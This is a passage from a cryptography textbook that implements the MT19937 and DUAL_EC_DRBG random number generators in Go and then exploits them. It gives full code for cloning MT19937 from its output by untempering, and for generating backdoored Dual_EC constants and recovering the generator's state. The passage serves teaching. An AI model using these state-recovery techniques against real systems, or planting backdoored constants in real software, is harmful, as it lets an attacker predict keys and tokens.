67 if x%2 == 1 {
68 xA ^= A
69 }
70 mt.state[i] = mt.state[(i+M)%N] ^ xA
71 }
72 mt.index = 0
73 }

We can now combine our temper(y) and twist() functions to write code for gener-
ating random numbers. The Generate() function shown in listing 3.6 takes the next ele-
ment in the state pointed to by mt.index and outputs it after running it through temper(y).
If mt.index runs its course of 624 values the state is refreshed by calling mt.twist() on
line 56.

Listing 3.6 ch03/mt19937/impl_mt19937/impl_mt19937.go

54 func (mt *MT19937) Generate() uint32 {


55 if mt.index == 0 {
56 mt.twist()
57 }
58 y := temper(mt.state[mt.index])
59 mt.index = (mt.index + 1) % N
60 return y
61 }

To test our implementation we seed it with a fixed value and test the output against a
sequence generated by a reference implementation (you can use std::mt19937 in C++ to
generate these values). The code for this test is shown in listing 3.7.

Listing 3.7 ch03/mt19937/impl_mt19937/impl_mt19937_test.go

7 func TestMT19937WithDefaultSeed(t *testing.T) {


8 mt := NewMT19937()
9 mt.Seed(5489)
10
11 expected := []uint32{
12 3499211612,
13 581869302,
14 3890346734,
15 3586334585,
16 545404204,
17 4161255391,
18 3922919429,
19 949333985,
20 2715962298,
21 1323567403,
22 418932835,
23 2350294565,
24 1196140740,
25 }
26
27 for i := 0; i < len(expected); i++ {
28 if r := mt.Generate(); r != expected[i] {
29 t.Fatalf(”Generated: %d, Expected %d.”, r, expected[i])
30 }
31 }
32 }

You should run the test yourself by executing make mt19937 in the accompanying code
repository. We now have a working implementation of MT19937 that we can exploit.

3.1.2 Exploiting MT19937


Let us start by writing a function to test our exploit. The test will fail for now but will
help us understand the flow of the exploit. In listing 3.8 we define a test that creates an
instance of MT19937 on line 8 using the implementation from the previous section. On
line 9 we seed this RNG using the current UNIX time (number of seconds passed since
the Unix Epoch on January 1st, 1970). Seeding a PRNG with time is a horrible practice
for production software as the seed is easily guessable for an attacker – the right practice is
to seed the PRNG with the output of a hardware RNG – but it is okay for testing purposes.
On line 11 we clone the RNG just like we did for the linear-congruential generator ex-
ample in the previous chapter. We will look at the implementation of CloneMT19937() in a
moment, but the important thing to note is that this function is defined in the exploit_mt19937
package which is different from the impl_mt19937 package and hence cannot access the
internal state of our MT19937 struct that we defined earlier in listing 3.1.
Coming back to listing 3.8 we then generate 100 values using the newly cloned RNG
and compare them to the output generated by the original RNG using the loop defined on
lines 13 - 22. If there is a mismatch for any value we fail the test, otherwise, we print the
values once every twenty iterations just to let us know things are coming along smoothly.

Listing 3.8 ch03/mt19937/exploit_mt19937/exploit_mt19937_test.go

7 func TestCloneMT19937(t *testing.T) {


8 originalRng := impl_mt19937.NewMT19937()
9 originalRng.Seed(uint32(time.Now().Unix()))
10
CloneMT19937
11 clonedRng := CloneMT19937(originalRng) does not have access
12
to originalRng.state
13 for i := 0; i < 100; i++ {
14 cloned := clonedRng.Generate()
15 observed := originalRng.Generate()
16 if observed != cloned {
17 t.Fatalf(”observed: %08x, cloned: %08x”, cloned, observed)
18 }
19 if i%20 == 0 {
20 t.Logf(”observed: %08x, cloned: %08x”, cloned, observed)
21 }
22 }
23 }

The bulk of the exploit work is carried out by the CloneMT19937(mt) function which
takes an MT19937 RNG as input and clones it strictly by observing its output. The goal
of this function is to generate values using the original RNG while somehow reversing
its internal state just by using the observed values, and then use the recovered state to
construct a cloned RNG.
Listing 3.9 shows our attack function. It generates N values using the original RNG.
Each number in the internal state of the original RNG corresponds to exactly one gen-
erated value, albeit not directly. The RNG algorithm picks a number from the internal
state and transforms it using the temper(y) function. To recover the original state we call
an untemper(y) function on line 34 that will reverse this transformation. Once we have
recovered the entire state of the original RNG by “untempering” N generated values we
can construct a new RNG with this state and return that as the result of our RNG cloning
attack.

Listing 3.9 ch03/mt19937/exploit_mt19937/exploit_mt19937.go

31 func CloneMT19937(mt *impl_mt19937.MT19937) *impl_mt19937.MT19937 {


32 var recoveredState [impl_mt19937.N]uint32
33 for i := uint32(0); i < impl_mt19937.N; i++ {
34 recoveredState[i] = untemper(mt.Generate())
35 }
36 return impl_mt19937.NewMT19937WithState(recoveredState)
37 }

It is finally time to tackle the untempering that lies at the heart of our attack. In the
previous section we defined temper(y) in listing 3.4 that did some bit twiddling to go
from y →y1 →y2 →y3 →y4 and then returned y4. Our untemper(y) therefore needs to
go in the other direction, i.e., from y4 →y3 →y2 →y1 →y and then return the recovered
y. This is visualized in figure 3.2.

Figure 3.2 Attacker observes PRNG output and reverses operations to recover PRNG state.

Our goal is to build an intuition of how the bitwise operations are reversed. The good
news is that each step (e.g., from y2 to y3) looks pretty similar, i.e., it involves one XOR
operation (the ^ symbol), one bitwise shift operation (in the left or right direction, denoted
by « and » respectively) and one bitwise AND operation denoted by &. For example, when
the original RNG is tempering values it calculates y2 from y1 using the line shown in listing
3.10.
Listing 3.10 XOR-Shift-AND in MT19937’s temper(y) function

y2 := y1 ^ (y1<<S)&B

To understand how the reversal works, let’s look at individual bits, starting from the
original 32 bits of y1 as shown in figure 3.3.

Figure 3.3 The “original” bits of y1 (4 bytes total)

The first transformation that takes place is the one specified inside the brackets, i.e., (y1
« S). Since S is defined as a constant in listing 3.2, we can visualize this operation as shown
in figure 3.4.

Figure 3.4 y1 « S where S = 0x07.

The next step is to perform bitwise AND between y1 « S (figure 3.4) and the constant
B. The individual bits of B are shown in figure 3.5.

Figure 3.5 B = 0x9D2C5680

After performing the bitwise AND between figures 3.4 and 3.5 we end up with figure
3.6. Please note that the true bits of B have the effect of “activating” the corresponding bit
in figure 3.4, which is a fundamental property of bitwise AND.

Figure 3.6 (y1 » S) & B

The final step for transforming y1 into y2 is to XOR the result of figure 3.6 with the
original y1, giving us figure 3.7, which is equivalent to y2.
If you look at figure 3.7 closely you will notice that y2 retains a lot of information about
y1. In fact, if we start from the right-hand side and start scanning to the left we will see
that the first 7 bits correspond exactly to y1 bits. That is, y1 0 is equal to y2 0 , y1 1 is equal to
y2 1 and so on all the way up to the seventh bit from right y1 6 .
Figure 3.7 y2 = y1 ^ (y1 » S) & B

The eighth bit is a little tricky. Instead of being simply y1 7 it is equal to y1 7 ^ y1 0 .


Here’s where we are in luck, as we do know y1 0 . In fact, we can imagine recovering y1
from y2 as building a bridge, starting from the right-hand side and stepwise moving to the
left. For the first few bits we simply pick the corresponding y2 bit to lay the next brick for
our bridge. When we reach the eighth bit we need to find out y1 7 but it has been XOR’ed
with y1 0 . We have already laid the y1 0 brick by this point so we can use that value to XOR
again and cancel itself out, leaving behind y1 7 that we needed to recover.
This process is visualized in figure 3.8. The first 7 bits of y2 (from the right, i.e., the least-
significant bits) are mapped straightforwardly to y1 while the “garbled” bits are recovered
by leveraging an earlier recovered bit from the right.

Figure 3.8 Right-to-left recovery of 14 bits of y1 from y2

We do not need to look at each bit being recovered to understand the attack. The main
intuition stays the same throughout the process: we reverse the bitwise operations one
by one and use earlier recovered bits to aid in calculating more bits. The complete code
for untempering y from y4 is shown in listing 3.11. Lines 15 - 24 show how we “build
the bridge” from right to left for recovering y1 from y2. Please note that the direction
of the bitwise shift operation is reversed between tempering and untempering for each
corresponding recovery.
Listing 3.11 ch03/mt19937/exploit_mt19937/exploit_mt19937.go

7 func untemper(y4 uint32) uint32 {


8 // recover y3 from y4
9 y3 := y4 ^ (y4 >> impl_mt19937.L)
10
11 // recover y2 from y3
12 y2 := y3 ^ (y3<<impl_mt19937.T)&impl_mt19937.C
13
14 // recover y1 from y2
15 y2_0 := y2 << impl_mt19937.S
16 y2_1 := y2 ^ (y2_0 & impl_mt19937.B)
17 y2_2 := y2_1 << impl_mt19937.S
18 y2_3 := y2 ^ (y2_2 & impl_mt19937.B)
19 y2_4 := y2_3 << impl_mt19937.S
20 y2_5 := y2 ^ (y2_4 & impl_mt19937.B)
21 y2_6 := y2_5 << impl_mt19937.S
22 y2_7 := y2 ^ (y2_6 & impl_mt19937.B)
23 y2_8 := y2_7 << impl_mt19937.S
24 y1 := y2 ^ (y2_8 & impl_mt19937.B)
25
26 // recover y from y1
27 y1_0 := y1 >> impl_mt19937.U
28 y1_1 := y1 ^ y1_0
29 y1_2 := y1_1 >> impl_mt19937.U
30 y := y1 ^ y1_2
31
32 return y
33 }

Let’s execute our tests using make mt19937:

Listing 3.12 Output for make mt19937

go test -v ./ch03/mt19937/exploit_mt19937
=== RUN TestCloneMT19937
exploit_mt19937_test.go:22: observed: bcc1df92, cloned: bcc1df92
exploit_mt19937_test.go:22: observed: d0d8875f, cloned: d0d8875f
exploit_mt19937_test.go:22: observed: d0f264cc, cloned: d0f264cc
exploit_mt19937_test.go:22: observed: 374635d9, cloned: 374635d9
exploit_mt19937_test.go:22: observed: bc6d6cc3, cloned: bc6d6cc3
--- PASS: TestCloneMT19937 (0.00s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/mt19937/exploit_mt19937
0.029s

We successfully cloned a PRNG just by observing its generated values, without ever
having access to the internal state of the original RNG, now we can “predict” any values
that are going to be generated by the original generator. We were able to accomplish this
because MT19937’s equivalent function of the Output(N) operation in figure 3.1 is easily
reversible.
3.2 Implementing and exploiting Dual Elliptic Curve Deterministic Ran-
dom Bit Generator
We saw how to implement and reverse the MT19937 PRNG. Our next example is one of
the most famous CSPRNGs – albeit for some pretty unfortunate reasons.
DUAL_EC_DRBG stands for Dual Elliptic Curve Deterministic Random Bit Generator.
For nine years between 2006 and 2015, it was one of the four CSPRNGs recommended
by NIST in the SP 800-90A standard. 3
The algorithm (much like the ones we covered for LCG and MT19937 generators)
relies on some mathematical constants. It is possible that the constants recommended by
NIST contained a backdoor that allowed NSA (National Security Agency) to clone any
DUAL_EC_DRBG after observing just a couple of generated values – even though it is
supposed to be cryptographically secure!
We cannot conclusively ascertain that the constants recommended by NIST did con-
tain a backdoor; instead we will see how these constants can be picked in a way that can
make the algorithm exploitable. In other words, if we were recommending constants for
DUAL_EC_DRBG we will learn how to pick them in a way that would allow us to predict
future values after observing its output.
Before we implement DUAL_EC_DRBG though we need to learn about some build-
ing blocks, starting with big numbers.

3.2.1 Building block for DUAL_EC_DRBG: Big numbers


Integers on computer systems usually have limits. For example, an unsigned 32-bit integer
can hold a maximum value of 4294967295. In cryptographic algorithms, we usually need
to perform mathematical operations on numbers much larger than that. We regularly end
up working with numbers that are much larger than the number of atoms in the universe.
We, therefore, need something that can perform computations on arbitrary length integers.
This is simple in Python where all integers are “bignums” (short for big numbers –
and have nothing to do with big brother, big pharma or big insurance; except in terms
of quarterly revenues). In Go we need to rely on the math/big package for performing
arbitrary-precision arithmetic operations. The example below is taken from the official
documentation of math/big; it calculates the smallest Fibonacci number with 100 digits.
The Fibonacci numbers are the sequence defined by the linear recurrence equation Fn =
Fn−1 + Fn−2 where F1 = 1 and F0 = 0. The first few Fibonacci numbers as 0, 1, 1, 2, 3, 5,
8, 13, 21, 34, 55, 89 and so forth. In listing 3.13 we use the bignum integers to calculate
the first Fibonacci number that is larger than 1099 .

Listing 3.13 Calculating the smallest Fibonacci number with 100 digits

1 package main
2
3 import (

3 Special Publication 800-90. (2006). NIST. https://nvlpubs.nist.gov/nistpubs/Legacy/SP/


nistspecialpublication800-90.pdf
4 ”fmt”
5 ”math/big”
6 )
7
8 func main() {
9 a := big.NewInt(0)
10 b := big.NewInt(1)
11
12 var limit big.Int
13 limit.Exp(big.NewInt(10), big.NewInt(99), nil)
14
15 for a.Cmp(&limit) < 0 { This is equivalent to a = a + b
16 a.Add(a, b)
17 a, b = b, a
18 } This simply swaps a and b
19 fmt.Println(a)
20 }

Running this program will print a really large number on the output (it’s a 100 digit
number that has been broken down over two lines for presentation).

Listing 3.14 Smallest Fibonacci number larger than 1099

13447196675861531814197166417245678868908506962757
67987106294472017884974410332069524504824747437757

As you can see, this number is much larger than what we can store in 32 (or even 64)
bits. The big package however could handle it easily because it can work with arbitrary-
precision integers.

3.2.2 Building block for DUAL_EC_DRBG: Elliptic curves


Another very important mathematical construct that is used widely in cryptography – and
specifically by the DUAL_EC_DRBG algorithm – is “elliptic curves”. We will encounter
them many times throughout this book, they are defined by equation 3.2.

y 2 = x 3 + ax + b (3.2)
Some example plots are shown in figure 3.9 for various values of a and b:
Go comes with the crypto/elliptic package that can be used to perform operations
on elliptic curves. We will cover elliptic curves in more detail in later chapters. For the
time being the important things to understand are:
An elliptic curve is a set of points defined by the equation 3.2.
For a given curve, addition can be performed between any two points P and Q. The
result P +Q will also lie on the curve. An analogy can be drawn in modulus arithmetic
by saying if z = (x + y) mod n then z is also an integer that is less than n, just like
x and y. The operation does not involve simply numerically adding the respective
coordinates, as that would result in a point somewhere outside of the curve. For ellip-
tic curves + denotes a special operation that satisfies various properties we need (e.g.,
P +Q = Q +P). We do not need to worry about the details of that operation right now,
Figure 3.9 Some example elliptic curves obtained by plotting equation 3.2 for different values of a and
b.

as the curve.Add(..) function in Go’s crypto/elliptic package will take care of


it for us.
For a given curve, scalar multiplication can be performed on its points, where a
point (x, y) is multiplied by a single integer. The result of these operations are also
points on the same curve. This is denoted by nP meaning P should be “added” (the
special operation for elliptic curves) to itself n times to generate the result. In the
crypto/elliptic package it is provided by curve.ScalarMult(...) function.
The crypto/elliptic package uses arbitrary-precision integers provided by math/big
package (explained in the previous section) to represent individual coordinates which
makes it perfectly suited for our cryptographic needs. The package comes with a set of
standard curves that are widely used in cryptographic applications. We will use one of
these curves (known as P256) to implement DUAL_EC_DRBG.

3.2.3 Implementing DUAL_EC_DRBG


DUAL_EC_DRBG depends on two points P and Q shown in listing 3.15. These are log-
ically similar to constants we saw in preceding generators, i.e., implementations use these
constants to standardize their behavior. The NIST specification for DUAL_EC_DRBG
provides fixed values for these points. Please note that each coordinate is 32 bytes long.

Listing 3.15 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

10 const (
11 Px = ”6b17d1f2e12c4247f8bce6e563a440f277037d812deb33a0f4a13945d898c296”
12 Py = ”4fe342e2fe1a7f9b8ee7eb4a7c0f9e162bce33576b315ececbb6406837bf51f5”
13 Qx = ”c97445f45cdef9f0d3e05e1e585fc297235b82b5be8ff3efca67c59852018192”
14 Qy = ”b28ef557ba31dfcbdd21ac46e2a91e3c304f44cb87058ada2cb815151e610046”
15 )

The generation algorithm depends on two functions gP (x) and gQ (x). These corre-
spond to Next(...) and Output(...) in figure 3.10 respectively.

Figure 3.10 gP (x) advances the state, gQ (x) transforms it before generating an output value.

The internal state of the DUAL_EC_DRBG consists of just one bignum. The defini-
tions of gP (x) and gQ (x) rely on the scalar multiplication of this bignum with points P
and Q respectively. The result of the scalar multiplication is not, however, directly used.
Instead, two helper functions are used:
X (x, y) = x; discards the y coordinate and returns just the x coordinate.
t(x); returns the 30 least significant bytes of x. In other words, it “truncates” the input
to 30 bytes.
If the internal state of the single bignum is denoted by n, gP (x) and gQ (x) are defined
as shown in equation 3.3.

gP (n) = X (nP)
(3.3)
gQ (n) = t(X (nQ))

Equation 3.3 can be read as “to advance the RNG, perform scalar multiplication of the point
P with the internal state n and store the X-coordinate as the new state”. Similarly, the second
line can be read as “to generate a new value, perform scalar multiplication of the point Q with the
internal state and truncate the X-coordinate of the result to 30 bytes before outputting it as the next
random number”. In terms of our understanding of PRNG operation in figures 3.1 & 3.10
we can write the Next(...) and Output(...) functions as shown in equation 3.4.

N ext(StateN ) = gP (StateN −1 )
(3.4)
Output(StateN ) = gQ (StateN )

The actual code for generating the numbers is pretty minimal thanks to the crypto/elliptic
package doing most of the heavy lifting. We start by defining a type that represents a point
on the curve. When creating a new Point, we take two strings as input representing the x
and y coordinates. We then create use big.Int to parse these strings and (if they are valid
inputs) store them as two bignums (one for each coordinate). This is shown in listing 3.16.

Listing 3.16 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

10 type Point struct {


11 X *big.Int
12 Y *big.Int
13 }
14
15 func NewPoint(x, y string) (*Point, error) {
16 xb, ok := new(big.Int).SetString(x, 16)
17 if !ok {
18 return nil, errors.New(”invalid x”)
19 }
20
21 yb, ok := new(big.Int).SetString(y, 16)
22 if !ok {
23 return nil, errors.New(”invalid y”)
24 }
25
26 return &Point{
27 X: xb,
28 Y: yb,
29 }, nil
30 }
31
32 func (p1 *Point) Cmp(p2 *Point) bool {
33 // For big.Int, a.Cmp(b) equals 0 when a == b
34 return p1.X.Cmp(p2.X) == 0 && p1.Y.Cmp(p2.Y) == 0
35 }

As we discussed before, the internal state of our DUAL_EC_DRBG generator consists


of a single bignum. Let’s define a new type to hold this state as well as the two “generator”
points that shall be used for multiplication, as shown in listing 3.17.

Listing 3.17 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

44 type DualEcDrbg struct {


45 state *big.Int
46 p *Point
47 q *Point
48 }
49
50 func NewDualEcDrbg(p *Point, q *Point) (*DualEcDrbg, error) {
51 if p == nil {
52 return nil, errors.New(”invalid point p”)
53 }
54 if q == nil {
55 return nil, errors.New(”invalid point q”)
56 }
57
58 return &DualEcDrbg{
59 state: nil,
60 p: p,
61 q: q,
62 }, nil
63 }
64
65 func (drbg *DualEcDrbg) Seed(seed *big.Int) {
66 drbg.state = seed
67 }

We can now implement the RNG operations defined in the equation 3.4 in a Generate()
function as shown in listing 3.18.

Listing 3.18 ch03/dual_ec_drbg/impl_dual_ec_drbg/impl_dual_ec_drbg.go

69 func (drbg *DualEcDrbg) Generate() []byte {


70 if drbg.state == nil {
71 seed := new(big.Int).SetInt64(time.Now().Unix())
72 drbg.Seed(seed)
73 }
74
75 curve := elliptic.P256()
76 // Discard the y-coordinate
77 drbg.state, _ = curve.ScalarMult(drbg.p.X, drbg.p.Y, drbg.state.Bytes())
78 // Discard the y-coordinate
79 qMulResult, _ := curve.ScalarMult(drbg.q.X, drbg.q.Y, drbg.state.Bytes())
80
81 // Truncate and return 30 bytes
82 qMulResultBytes := qMulResult.Bytes()
83 qMulResultLen := len(qMulResultBytes)
84 return qMulResultBytes[qMulResultLen-30:]
85 }

And that’s it! We now have a fully functional DUAL_EC_DRBG that we can exploit
in the next section.

3.2.4 Exploiting DUAL_EC_DRBG


DUAL_EC_DRBG can be exploited if the two generator points it uses are mathematically
related. Both gP (x) and gQ (x) act on the same input x (the internal state of the RNG). This
allows an attacker to observe the output of the gQ function and calculate the output of gP
by exploiting a secret relation between P and Q. We do not need to actually reverse gQ (x),
instead we will leverage the mathematical relationship between P and Q to calculate the
result gP (x) would produce when acting upon the same x.
To simplify our discussion let us denote N th state and output with sN and oN respectively.
Our values then look like equation 3.5.

s0 = Seed
o0 = t(X (s0Q))
(3.5)
s1 = X (s0 P)
o1 = t(X (s1Q))
Can we predict o1 just by observing o0 ? If P and Q are related such that P = dQ, then
we can multiply s0Q with d to get s0 P as shown in equation 3.6 which really constitutes
the heart of our attack on DUAL_EC_DRBG.

d(s0Q) = s0 P (3.6)

Once we have s0 P we’ll essentially have recovered the next state s1 which means now we
can clone any output from this RNG. If P and Q were not related there would have been
no way to observe o0 and somehow deduce s1 . The flow of the attack is shown in figure
3.11.

Figure 3.11 Attacker observes Output0 and calculates State1 using the secret relationship between P
and Q

The first hurdle for our attack is to recover the point s0Q from observed output o0 . We
know that the output o0 :
Has discarded the Y-coordinate of the original point s0Q by applying the X () func-
tion.
Even the remaining X-coordinate has been truncated to 30 bytes.
Let’s think of how to reverse both of these transformations. If a point lies on a curve (or
in other words, satisfies its equation) we can calculate the Y-coordinate simply by plugging
the X-coordinate into the equation. This is analogous to looking up the stock price of a
symbol at a particular time. The stock price is the Y-coordinate with time running along
the X-axis, the statement "stock price of XYZ when the market closed yesterday" holds just
as much information as giving you the Y-coordinate value itself because the curve (i.e.,
which company’s plot we are tracking) and point in time (the X-coordinate) work just fine
for conveying the actual point in the plot.
The problem is, we do not have the entire X-coordinate. The original X-coordinate
was 32 bytes long, the output function discarded 2 bytes and gave us 30 of them. How can
we get the 2 missing bytes?
Turns out, we can kill two birds with one stone here! We could simply try all possible
values for those two bytes, i.e., from 000016 to F F F F16 and see if any of them satisfy
our elliptic curve specified by the equation 3.2, repeated here again in for the reader’s
convenience.

y 2 = x 3 + ax + b
√ (3.7)
y = x 3 + ax + b

When we try to guess all the possible values for the missing 2 bytes of our X-coordinate
only the correct guess will satisfy equation 3.7. Every guessed value of x will generate some
value when plugged into the right-hand side of the equation, but only the correct value
will have an actual square root! Not only we can guess the right X-coordinate by using the
equation it will also handily give us the Y-coordinate for continuing our attack.
Listing 3.19 shows the code for calculating the Y-coordinate for a guessed X-coordinate.
In case of wrong guesses, our calculation of the square root will fail at line 43. The calcu-
lations for our coordinates require us to pick a curve (i.e., a set of values for a and b) that
would satisfy equation 3.7. We do this by using a standard curve called P256 on line 36.

Listing 3.19 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg.go

35 func CalculateYCoordinate(x *big.Int) (*big.Int, error) {


36 curve := elliptic.P256()
37 xCube := new(big.Int).Exp(x, new(big.Int).SetInt64(3), curve.Params().P)
38 ax := new(big.Int).Mul(new(big.Int).SetInt64(-3), x)
39 xCubePlusAx := new(big.Int).Add(xCube, ax)
40 xCubePlusAx = new(big.Int).Mod(xCubePlusAx, curve.Params().P)
41 xCubePlusAxPlusB := new(big.Int).Add(xCubePlusAx, curve.Params().B)
42 xCubePlusAxPlusB = new(big.Int).Mod(xCubePlusAxPlusB, curve.Params().P)
43 y := new(big.Int).ModSqrt(xCubePlusAxPlusB, curve.Params().P)
44 if y == nil {
45 return nil, errors.New(”not a valid point”)
46 }
47 ySquared := new(big.Int).Exp(y, new(big.Int).SetInt64(2), curve.Params().P)
48 if ySquared.Cmp(xCubePlusAxPlusB) != 0 {
49 return nil, errors.New(”not a valid point”)
50 }
51 if !curve.IsOnCurve(x, y) {
52 return nil, errors.New(”not a valid point”)
53 }
54
55 return y, nil
56 }
The question now is, how do we generate two points P and Q that have this secret
relationship that allows us to compromise DUAL_EC_DRBG? Standard elliptic curves
such as P256 have a fixed P that is known as its “base point”. Since we want to satisfy
equation 3.6 we need to find a corresponding point Q such that:

P = dQ (3.8)

Since P is fixed on the left-hand side by the standard curve definition itself, we have
to find a Q that would satisfy the same relationship. We cannot randomly pick any Q, as
P would not be a multiple of those values. Instead, we start by picking a random (scalar)
value for d. We then find the modular inverse of d and call it e. Now we can multiply both
sides by e to get us equation 3.9.

eP = edQ
(3.9)
eP = Q

Instead of randomly picking a point Q and multiplying it with a random scalar d to get
a secretly related P, we went the other way around. Point P was fixed by the P256 curve,
we generated a random scalar d, found its modular inverse and used that to calculate a
backdoor-ed point Q. The code for finding the backdoor-ed constants is shown in listing
3.20.

Listing 3.20 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg.go

16 func GenerateBackdoorConstants() (*impl_dual_ec_drbg.Point, *


impl_dual_ec_drbg.Point, *big.Int) {
17 rnd := rand.New(rand.NewSource(time.Now().Unix()))
18 curve := elliptic.P256()
19 n := curve.Params().N
20 d := new(big.Int).Rand(rnd, n)
21 e := new(big.Int).ModInverse(d, n)
22 px, py := curve.Params().Gx, curve.Params().Gy
23 qx, qy := curve.ScalarMult(px, py, e.Bytes())
24 return &impl_dual_ec_drbg.Point{
25 X: px,
26 Y: py,
27 }, &impl_dual_ec_drbg.Point{
28 X: qx,
29 Y: qy,
30 }, d
31 }

We can now combine our GenerateBackdoorConstants() and CalculateYCoordinate(...)


functions to exploit our DUAL_EC_DRBG implementation. The steps for our attack are:
Generate backdoor-ed constant Q such that P = dQ. The value of d is secret and is
known only to the attacker.
Instantiate a DUAL_EC_DRBG generator with the backdoor-ed constants.
Generate two 30-byte values from the target RNG. Remember, each invocation of
DUAL_EC_DRBG generates 30 bytes.
For the first generated value, try plugging all the values from 000016 to F F F F16 as
the two most significant bytes of the x coordinate and see if there is a corresponding
y coordinate that would make (x, y) lie on the elliptic curve.
Multiply this point by the secret value d to find the next state.
Use the newly calculated state to generate the next output.
These steps are visualized in figure 3.12.

Figure 3.12 Flow chart for exploiting DUAL_EC_DRBG

Let’s write a test for our exploit as shown in listing 3.21. We will generate backdoor-
ed constants and use those to instantiate a DUAL_EC_DRBG RNG with these constants.
We then call CloneDualEcDrbg(...) on line 49 that takes the original RNG, the constants
as well the secret value d that will be used to compromise the RNG operation.
Listing 3.21 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg_test.go

38 func TestCloneDualEcDrbg(t *testing.T) {


39 p, q, d := GenerateBackdoorConstants()
40 drbg, err := impl_dual_ec_drbg.NewDualEcDrbg(p, q)
41 if err != nil {
42 t.Fatalf(”error creating drbg: %s”, err)
43 }
44 seed := new(big.Int).SetInt64(time.Now().Unix())
45 drbg.Seed(seed)
46 for i := 0; i < 100; i++ {
47 _ = drbg.Generate()
48 }
49 clonedDrbg, err := CloneDualEcDrbg(drbg, p, q, d)
50 if err != nil {
51 t.Fatalf(”error brute forcing drbg: %s”, err)
52 }
53 for i := 0; i < 100; i++ {
54 cloned := clonedDrbg.Generate()
55 observed := drbg.Generate()
56 if bytes.Compare(cloned, observed) != 0 {
57 t.Fatalf(”observed=%s, cloned=%s”, hex.EncodeToString(observed), hex.
EncodeToString(cloned))
58 }
59 if i%20 == 0 {
60 t.Logf(”observed=%s, cloned=%s”, hex.EncodeToString(observed), hex.
EncodeToString(cloned))
61 }
62 }
63 }

We can finally define CloneDualEcDrbg(...) to leverage the backdoor-ed constants


for cloning the RNG. The process is already outlined in figure 3.12, and the actual code
is shown in listing 3.22.

Listing 3.22 ch03/dual_ec_drbg/exploit_dual_ec_drbg/exploit_dual_ec_drbg.go

56 func CloneDualEcDrbg(drbg *impl_dual_ec_drbg.DualEcDrbg, p, q *


impl_dual_ec_drbg.Point, d *big.Int) (*impl_dual_ec_drbg.DualEcDrbg,
error) {
57 observed := drbg.Generate()
58 check := drbg.Generate()
59
60 curve := elliptic.P256()
61 fmt.Printf(” check: %s\n”, hex.EncodeToString(check))
62 for i := uint16(0); i < 0xffff; i++ {
63 guess := make([]byte, 32)
64 binary.BigEndian.PutUint16(guess[0:2], i)
65 n := copy(guess[2:], observed)
66 if n != 30 {
67 return nil, errors.New(”could not copy”)
68 }
69 x := new(big.Int).SetBytes(guess)
70 y, err := CalculateYCoordinate(x)
71 if err != nil {
72 continue
73 }
74 nextS, _ := curve.ScalarMult(x, y, d.Bytes())
75 nextO, _ := curve.ScalarMult(q.X, q.Y, nextS.Bytes())
76 nextOLen := len(nextO.Bytes())
77 nextOTruncated := nextO.Bytes()[nextOLen-30:]
78 fmt.Printf(”next_o: %s, guess: %04X\r”, hex.EncodeToString(nextOTruncated
), i)
79 if bytes.Compare(check, nextOTruncated) == 0 {
80 clonedDrbg, err := impl_dual_ec_drbg.NewDualEcDrbg(p, q)
81 if err != nil {
82 continue
83 }
84 fmt.Println()
85 clonedDrbg.Seed(nextS)
86 return clonedDrbg, nil
87 }
88 }
89 fmt.Println()
90 return nil, errors.New(”could not find any points”)
91 }

If you run the accompanying test using make dual_ec_drbg, you will see the test try
a few candidate values for x before finding the right one and then cloning the RNG. The
output is shown below (truncated for presentation):

Listing 3.23 Output for make dual_ec_drbg

go test -v ./ch03/dual_ec_drbg/exploit_dual_ec_drbg
=== RUN TestBackdoorConstants
--- PASS: TestBackdoorConstants (0.00s)
=== RUN TestCalculateYCoordinate
--- PASS: TestCalculateYCoordinate (0.00s)
=== RUN TestCloneDualEcDrbg
check: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85
next_o: 2774d76eacc0c20b17de4d0958cfe6882fa9132cd2951f0eaba97d930a85, guess:
DCD2
exploit_dual_ec_drbg_test.go:60: observed=19fc85d9..., cloned=19fc85d9...
exploit_dual_ec_drbg_test.go:60: observed=9e12c097..., cloned=9e12c097...
exploit_dual_ec_drbg_test.go:60: observed=3ec6b2a4..., cloned=3ec6b2a4...
exploit_dual_ec_drbg_test.go:60: observed=01cf30cc..., cloned=01cf30cc...
exploit_dual_ec_drbg_test.go:60: observed=91d0b390..., cloned=91d0b390...
--- PASS: TestCloneDualEcDrbg (6.11s)
PASS
ok github.com/krkhan/crypto-impl-exploit/ch03/dual_ec_drbg/
exploit_dual_ec_drbg 6.124s

Congratulations, you have now implemented and exploited a bona fide CSPRNG by
performing a state-extension attack on it!

3.3 Summary
MT19937 are widely-used RNGs where the internal state consists of 624 values. It is
pretty straightforward to reverse one state value based on one output, and therefore
only 624 output values are needed to compromise the entire internal state of the
RNG (allowing an attacker to predict all future values).
DUAL_EC_DRBG is a CSPRNG but its constants can be backdoor-ed in a way
that can enable the attacker to predict all future values by observing only a couple of
generated values.
(CS)PRNGs can be compromised by reversing or predicting their internal states by
only observing the generated values. The PRNG functions Next(...) and Output(...)
should make such reversals hard for an attacker.
This chapter covers
What is symmetric key encryption and what
would make a symmetric encryption algorithm
“perfect”?
Stream ciphers

4
What is the exclusive-or (XOR) operation, and
how is it important for cryptography?
How can unbreakable encryption be achieved
with one-time pad (OTP) and what are the prac-
tical limitations of this approach?
What are stream ciphers, and how are they
related to one-time pad?
Implementing and exploiting linear-feedback shift
registers (LFSRs) as stream ciphers
Implementing and exploiting the RC4 stream
cipher

One of the core goals of cryptography is to provide confidentiality. Stream ciphers are
algorithms that help achieve confidentiality by encrypting plaintext one bit or one byte
at a time. They are used quite heavily in systems with limited computing power (e.g.,
embedded devices) or where performance requirements are quite high (e.g., for real-time
encryption of video calls). This chapter will explain what stream ciphers are, how they are
generally used and how attackers circumvent them.

4.1 Symmetric key encryption


Recall from chapter 1 that “symmetric” key encryption involves using the same key for
both encryption and decryption operations, shown again for reference in figure 4.1.

Figure 4.1 Symmetric key encryption

As it happens, there is already a perfect unbreakable algorithm for achieving this. It just
comes with some practical limitations that prevent it from becoming “one encryption al-
gorithm to rule them all.” Understanding those limitations will also shed further light on
the distinctions between cryptographic theory and implementation; but before we get to
